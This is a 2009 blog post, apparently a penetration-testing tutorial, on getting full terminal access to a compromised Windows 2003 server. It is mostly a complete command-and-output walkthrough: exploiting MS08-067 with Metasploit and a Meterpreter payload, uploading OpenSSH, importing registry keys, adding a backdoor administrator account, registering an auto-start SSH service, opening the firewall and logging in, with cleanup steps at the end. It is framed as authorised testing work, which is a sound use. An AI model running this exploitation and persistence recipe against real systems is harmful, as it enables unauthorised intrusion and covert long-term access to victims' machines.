Sunday, January 18, 2009

Installing OpenSSH on Windows via command shell

During a network penetration test, Windows command shell access is often obtained through some sort of exploit. If, for example, Metasploit is being used, command shell access can be delivered as the payload of a buffer overflow exploit. Or if perhaps the Meterpreter is being used, command shell access can be had by executing a CMD.EXE and interacting directly with it, or perhaps by having NETCAT shovel a command shell back to the penetration tester.

The challenge is that command shell access is not equivalent to full terminal access. The command shell may produce strange output due to control characters. Some commands may not function normally if they depend on the use of control sequences. If using NETCAT to shovel a shell, entering CTRL-C to terminate some command can end up terminating your shell!

If a penetration tester is permitted to modify the target server, then a more consistent, fully functional terminal level access will greatly help during the testing process. A number of choices exist including activating the telnet service, activating Microsoft terminal services (remote desktop protocol), installing VNC (www.realvnc.com), or installing OpenSSH for Windows. VNC is a great choice as it provides an easy command line installation with files residing in a single directory, and only a limited number of registry entries, however it offers no encryption. The telnet service offers no encryption either.

OpenSSH for windows (http://sshwindows.sourceforge.net/) is a minimized Cygwin (http://www.cygwin.com) environment that has been customized to support only SSH. It supports SSH command line terminal access, and secure copy / secure file transfer. Because the setup process in the OpenSSH packages uses the GUI, you have to perform some steps to customize your own command line only installation.


Preparing for a custom command line OpenSSH Installation in your lab

The basic steps to prepare a command line OpenSSH installation for Windows are as follows:

1. Download the setupssh.exe installation package from http://sshwindows.sourceforge.net/download

2. Run the GUI installer package on your Windows lab/test machine. I suggest accepting the default program location of C:\Program Files\OpenSSH

3. Get a full copy of all of the files under the directory C:\Program Files\OpenSSH onto a USB flash drive or other favorite media. Copy recursively with XCOPY and make sure you fully retain the directory structure.

4. Export the following registry keys using the REG EXPORT command as follows:

REG EXPORT “HKLM\SOFTWARE\Cygnus Solutions” 1.REG
REG EXPORT “HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd” 2.REG
REG EXPORT “HKLM\SYSTEM\ControlSet001\Services\OpenSSHd” 3.REG

5. Concatenate all of these registry files together into one file.
TYPE 1.REG 2.REG 3.REG >OPENSSH.REG

6. Save this OPENSSH.REG file into your local copy of all of the openssh directory structure.


Performing an installation via command shell

Now that you have all of this data saved on your USB thumb drive, lets assume that our penetration testing machine is a CentOS Linux operating system with IP address of 192.168.1.37, and that our target is a Windows 2003 SP0 machine with IP address of 192.168.1.40. Our penetration testing Linux machine has our OpenSSH package files mounted under /mnt/PenTestTools/win32/OpenSSH.

Our target happens to have the MS08-067 Server Service RPC vulnerability. Below is an example of how we exploit this vulnerability using Metasploit (www.metasploit.com) with the Meterpreter payload, upload our OpenSSH server files, add a new username, perform some minimal configuration and start the OpenSSH service.


Exploiting the Vulnerability

[root@localhost framework-3.2]# nc -v 192.168.1.40 445
Connection to 192.168.1.40 445 port [tcp/microsoft-ds] succeeded!
[root@localhost framework-3.2]# ./msfconsole

msf > search exploits ms08_067
[*] Searching loaded modules for pattern 'ms08_067'...
Exploits
========
Name Description
---- -----------
windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption
msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.40
RHOST => 192.168.1.40
msf exploit(ms08_067_netapi) > set TARGET 5
TARGET => 5
msf exploit(ms08_067_netapi) > show options

... truncated output ...
Exploit target:

Id Name
-- ----
5 Windows 2003 SP0 Universal


msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.37:45633 -> 192.168.1.40:4444)

meterpreter > sysinfo
Computer: SYSTEM-HJ28HHGL7N
OS : Windows .NET Server (Build 3790, ).


Uploading your OpenSSH Files

meterpreter > lcd /mnt/PenTestTools/win32/OpenSSH
meterpreter > lpwd
/mnt/PenTestTools/win32/OpenSSH
meterpreter > cd \
meterpreter > cd "Program Files"
meterpreter > mkdir openssh
Creating directory: openssh
meterpreter > cd openssh
meterpreter > pwd
C:\Program Files\openssh
meterpreter > upload -r . .
[*] uploading : ./uninstall.exe -> .\uninstall.exe
[*] uploaded : ./uninstall.exe -> .\uninstall.exe
[*] mirroring : ./bin -> .\bin
[*] uploading : ./bin/chmod.exe -> .\bin\chmod.exe
[*] uploaded : ./bin/chmod.exe -> .\bin\chmod.exe
[*] uploading : ./bin/chown.exe -> .\bin\chown.exe
[*] uploaded : ./bin/chown.exe -> .\bin\chown.exe
[*] uploading : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll
[*] uploaded : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll
.... lots of output truncated ....

meterpreter > execute -f cmd.exe –i
Process 848 created.
Channel 66 created.



Modifying the Registry and Adding Your Own Username

Here, we import all of our registry keys, then add our own username making sure to put it into the administrators group. Then we create the passwd and group files that OpenSSH needs for authentication purposes.


Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\openssh>whoami
whoami
nt authority\system

C:\Program Files\openssh>reg import openssh.reg
reg import openssh.reg
The operation completed successfully.

C:\Program Files\openssh>net user inet_p0wned gameover /add
net user inet_p0wned gameover /add
The command completed successfully.


C:\Program Files\openssh>net localgroup administrators inet_p0wned /add
net localgroup administrators inet_p0wned /add
The command completed successfully.


C:\Program Files\openssh>cd etc
cd etc

C:\Program Files\openssh\etc>..\bin\mkpasswd -l >passwd
..\bin\mkpasswd -l >passwd
C:\Program Files\openssh\etc>..\bin\mkgroup -l >group
..\bin\mkgroup -l >group

C:\Program Files\openssh\etc>sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto
sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto
[SC] CreateService SUCCESS



Start the OpenSSH Service

C:\Program Files\openssh\etc>sc start opensshd
sc start opensshd
SERVICE_NAME: opensshd
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE,
IGNORES_SHUTDOWN))
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1916
FLAGS :

C:\Program Files\openssh\etc>sc query opensshd
sc query opensshd
SERVICE_NAME: opensshd
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN))
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0

C:\Program Files\openssh\etc>netsh firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24

The following command was not found: firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24**

**Note: adding a port for the firewall is necessary if the firewall exists. If not, then you will get the command not found error message. It is a good idea to restrict the source networks so that you don’t leave a gaping opportunity while testing.

C:\Program Files\openssh\etc>exit
exit
meterpreter > quit

[*] Meterpreter session 1 closed.
msf exploit(ms08_067_netapi) > quit





Now, lets go ahead and SSH into our Windows server to check if things worked!


root@localhost:~/framework-3.2]# ssh inet_p0wned@192.168.1.40
The authenticity of host '192.168.1.40 (192.168.1.40)' can't be established.
RSA key fingerprint is ab:c8:bf:9f:b2:38:32:1d:6f:2b:34:a5:d0:99:dc:49.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.40' (RSA) to the list of known hosts.

OpenSSH for Windows. Welcome aboard!

inet_p0wned@192.168.1.40's password:
Could not chdir to home directory /home/inet_p0wned: No such file or directory
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\OpenSSH>
C:\Program Files\OpenSSH>whoami
system-hj28hhgl7n\inet_p0wned

C:\Program Files\OpenSSH>exit
Connection to 192.168.1.40 closed.
[root@localhost framework-3.2]#


Cleaning up

To clean up everything when you are finished, you need to delete the OpenSSH service, delete the registry keys and remove all of the relevant files. The following recipe should work reasonably well from a command shell. Remember that you cannot be using OpenSSH when deleting the service! So, you may need to exploit again with shell code before removing it.

C:\> SC STOP opensshd
C:\> SC DELETE opensshd
C:\> REG DELETE “HKLM\SOFTWARE\Cygnus Solutions” /f /va
C:\> REG DELETE “HKLM\SYSTEM\ControlSet001\Services\OpenSSHd” /f /va
C:\> REG DELETE “HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd” /f /va

C:\> CD "\Program Files"
C:\Program Files> RMDIR /Q /S opensshd
C:\Program Files> NETSH FIREWALL DELETE PORT TCP 22
C:\Program Files> NET USER inet_p0wned /DELETE